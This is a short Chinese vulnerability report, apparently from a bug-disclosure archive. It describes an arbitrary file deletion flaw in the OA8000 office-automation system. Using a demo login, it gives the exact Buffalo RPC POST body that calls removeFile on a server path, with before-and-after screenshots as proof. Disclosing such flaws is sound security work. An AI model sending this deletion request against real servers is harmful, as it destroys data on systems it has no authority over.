### 简要描述:
Just another bug.
### 详细说明:
以官网http://demo.oa8000.com/为例,
user:123456
登陆后,
向http://demo.oa8000.com/OAapp/bfapp//buffalo/oaPubptUploadService POST如下参数:
<buffalo-call>\n
<method>removeFile</method>\n
<string>C:/PROGRA~1/htoa/Tomcat/webapps/OAapp/1.html</string>\n
</buffalo-call>
即可删除1.html
[<img src="https://images.seebug.org/upload/201406/20231411e0bbd4d53d67ca1e02e7efed266e9367.png" alt="3.5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/20231411e0bbd4d53d67ca1e02e7efed266e9367.png)
### 漏洞证明:
在删除前,利用wooyun-2014-065670看到的结果本来是这样的
[<img src="https://images.seebug.org/upload/201406/20231047db18fdb37b873fac53736869d96c485a.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/20231047db18fdb37b873fac53736869d96c485a.png)
删除后,
[<img src="https://images.seebug.org/upload/201406/20231319458827222f58d1f30eef4eab1de1f6df.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/20231319458827222f58d1f30eef4eab1de1f6df.png)
暂无评论